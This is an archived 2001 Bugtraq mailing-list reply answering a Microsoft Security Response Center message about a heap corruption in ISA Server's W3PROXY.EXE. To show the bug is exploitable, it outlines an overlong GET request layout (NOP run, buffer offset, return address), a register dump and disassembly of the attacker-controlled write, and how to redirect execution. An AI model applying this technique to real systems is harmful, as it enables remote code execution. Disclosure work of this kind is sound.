Re: Microsoft ISA Server Vulnerability

From: dark spyrit (dspyritat_private)
Date: Fri Apr 27 2001 - 17:48:10 PDT

Next message: Jarno Huuskonen: "More nedit problems ? (was Re: PROGENY-SA-2001-10...)"

Previous message: Linux Mandrake Security Team: "MDKSA-2001:043 - rpmdrake update"
In reply to: Microsoft Security Response Center: "Re: Microsoft ISA Server Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This was tested with the standard edition available on the Microsoft site..

Details -

04/27/2001  01:56a             369,936 W3PROXY.EXE

Request - GET http://host/<2338 x nop><offset to user buffer><stored ret
address>

We found we needed to send this request twice to reach the code location
where we are able to execute our buffer.. the heap corruption can lead to
random crash locations - but we hit this point more often than not - the
fact is, it is possible.

EAX=41414141 EBX=02492394 ECX=78787878 EDX=0105B9F8 ESI=0105B9F8
EDI=024A25F0 EBP=0621FE1C ESP=0621FDF8 EIP=0101D72F o d I s z A p c
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000 ds:41414141=FFFFFFFF

001b:0101d72f   mov     [eax], ecx
001b:0101d731   mov     [ecx+04], eax
001b:0101d734   call    [ntdll!RtlLeaveCriticalSection]
001b:0101d73a   mov     eax, edi
001b:0101d73c   pop     edi
001b:0101d73d   pop     esi
001b:0101d73e   ret

(PASSIVE)-KTEB(854083E0)-TID(05C4)--W3PROXY!.text+0001C741----------

As you can see we are able to define the values of ecx and eax... we can
write whatever data we want to a location of our choosing.
By overwriting eax with a saved return address and ecx with the address of
our buffer we can execute our code.

We had a couple of inventive ways of getting the needed stack values..
overwriting string locations with the data and having the product output the
values was one. A few possibilities.

Am I done?

dark spyrit.


----- Original Message -----
From: "Microsoft Security Response Center" <secureat_private>
To: <BUGTRAQat_private>
Sent: Saturday, April 28, 2001 2:54 AM
Subject: Re: Microsoft ISA Server Vulnerability


Hi -

You're right that the root problem here is a heap corruption.  The
Knowledge Base article we published on the subject
(http://support.microsoft.com/support/kb/articles/q295/2/79.asp,
"Cause") notes that this is the case.  As part of our investigation, we
examined whether the heap corruption could, in this case, be exploited
to run code, but we were unable to find any way to do so.  If you can
demonstrate an ability to run code via the exploit, please contact us
immediately as we'd be most interested in investigating the issue
further.  Regards,

Scott Culp
Security Program Manager
Microsoft Corporation

Next message: Jarno Huuskonen: "More nedit problems ? (was Re: PROGENY-SA-2001-10...)"
Previous message: Linux Mandrake Security Team: "MDKSA-2001:043 - rpmdrake update"
In reply to: Microsoft Security Response Center: "Re: Microsoft ISA Server Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Apr 28 2001 - 10:13:15 PDT